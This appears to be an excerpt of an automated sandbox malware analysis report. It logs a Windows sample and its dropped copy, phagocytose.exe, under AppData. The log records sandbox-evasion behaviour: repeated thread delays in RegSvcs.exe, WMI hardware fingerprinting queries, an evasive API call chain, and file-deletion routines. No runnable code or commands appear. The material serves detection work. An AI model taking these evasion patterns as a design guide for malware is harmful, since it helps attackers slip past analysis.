Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597872	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597138	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596959	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594826	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594277	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597467	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7976	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1863	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1086	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8775	Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-102636

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	API coverage: 4.9 %
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API coverage: 5.2 %
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	API coverage: 6.4 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A445A
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AC6D1 FindFirstFileW,FindClose,	0_2_007AC6D1
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AC75C
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AEF95
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF0F2
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AF3F3
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A37EF
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3B12
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007ABCBC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00E8445A
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8C6D1 FindFirstFileW,FindClose,	2_2_00E8C6D1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00E8C75C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00E8EF95
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00E8F0F2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00E8F3F3
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00E837EF
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00E83B12
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00E8BCBC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00E8445A
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8C6D1 FindFirstFileW,FindClose,	6_2_00E8C6D1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_00E8C75C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00E8EF95
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00E8F0F2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00E8F3F3
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00E837EF
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00E83B12
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00E8BCBC

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007449A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597982	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597872	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597385	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597138	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596959	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594826	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594277	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
